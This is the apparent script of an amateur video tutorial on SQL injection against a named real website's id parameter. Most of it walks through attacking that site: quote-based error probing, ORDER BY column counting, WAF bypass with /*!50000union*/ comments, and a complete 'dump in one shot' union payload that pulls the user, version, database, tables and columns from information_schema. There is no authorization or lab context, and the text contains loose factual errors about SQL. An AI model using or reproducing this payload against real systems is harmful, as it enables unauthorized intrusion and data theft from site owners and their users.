Sql Injection first Lecture - Just Do it

1. Hello guys how are you...
2. iam fine ...
3. So today you learn basic of sql injection
4. .......
5. i am hasan afaque ... :)
6. I hope you all are fine
7. So today we learn how to inject a vulnerable website..
8. so lets start
9. So you know about some knowledge about Sql
10. if you donot no What is sql .. so i will describe now ..
11.  
12.  
13.  
14. Sql stand for structured query language and it is a database :)
15.  
16. So now talk about sql injection what is it ?
17.  
18. So lets start :)
19.  
20.  
21.  
22.  
23.  
24.  
25. Q1:) What is SQL ?
26. Ans:) SQL Stand for (Structured Query Language) and it was first introduced as a commercial database
27.  
28. systemin 1979 by Oracle Corporation.
29. Q1:) What is SQL Injection ?
30. Ans:) An SQL injection is a kind of injection vulnerability in which the attacker tries to inject arbitrary
31.  
32. pieces of malicious data into the input fields of an application.
33.  
34. So Today we will a Inject a site .
35.  
36. Site :: http://www.egyankosh.in/
37. Injecting Point :: http://www.egyankosh.in/campus.php?id=207
38.  
39. Requirments
40. 1) Hack Bar (i will give link in description :) so donot worry :) i will upload hackbar)
41. 2) Some knowledge about SQL (if you no ... So open google.com and learn from it =D)
42. in deskop i have Hackbar
43.  
44. so now i upload hackbar to firefox :)
45. Watch carefully :)
46.  
47. Press f9 to open or close hack bar :) so lets start ...
48.  
49. Site is http://www.egyankosh.in/
50. And this is Injecting Point .
51. so lets .. go
52.  
53.  
54. http://www.egyankosh.in/campus.php?id=207' when we put quote sql error become generate,,
55. ok its mean the website is vulnerable..
56.  
57. so what will we do
58. 1) find columns of website
59. 2) Then union select
60. 3) print table or column and your name , user, database ...
61.  
62. going to find columns of website
63.  
64. to find column we will do order by
65. so lets see
66. no error
67. order by 5 .. no error
68. order by 10 .. error
69. order by 8 ... error
70. order by 7 no error ... so their is 7 columns ... :)
71.  
72.  
73. now our mission is to union select it :) so lets see
74.  
75. and put - after id=
76.  
77. Error
78.  
79. This is Waf
80. What is waf
81. Answer:) It stand for web application firewall
82. so lets bypass it..
83. /*5000Union*/
84.  
85. http://www.egyankosh.in/campus.php?id=-207 /*!50000union+*/select 1,2,3,4,5,6,7
86.  
87. 2 and 5 comes...
88. means 2 and 5 is vulnerable column ...
89. we can write over query in 2 and 5 only :)
90. means we can execute query in it .. ok
91.  
92. lets do dios ...
93. Dios stand for DataInOneShort
94. .... i can print tables and column now with dios ...
95. union based > > Dios my sql >> Zen
96. then execute it
97.  
98. Wawoo .. Tables and columns show on page..
99.  
100.  
101. Now our goal is .. to print name or user or database
102.  
103. for print name+user+database+tables+columns .. we will concat it .. so lets concat it
104.  
105. to print user we write
106.  
107. User()
108. Database: database()
109. and for name we can convert in 0x
110. we lets go
111. offf for bidden error again so again bypass it with /*50000*/
112.  
113. yahoo bypassed now we can break it..
114. means to come on next line so we use </br> in hackbar its already given lets use it
115. Now print User
116. now print database
117. for version :: we can write :: version()
118. so lets print columns and tables
119.  
120. Tables + columns + user + name .. done '
121.  
122.  
123. Thanks for watching ...
124. Please Subscribe Channel .... Learn And Do it
125.  
126. ................................. See in next tutorial ```````````````````````````````````````
127. http://www.egyankosh.in/campus.php?id=-207 /*!50000union+*/select 1,/*!50000concat*/
128.  
129. (0x596f754e616d65,0x3c62723e,user(),0x3c62723e,version(),make_set(6,@:=0x0a,(select(1)from
130.  
131. (information_schema.columns)where@:=make_set
132.  
133. (511,@,0x3c6c693e,table_name,column_name)),@)),3,4,database(),6,7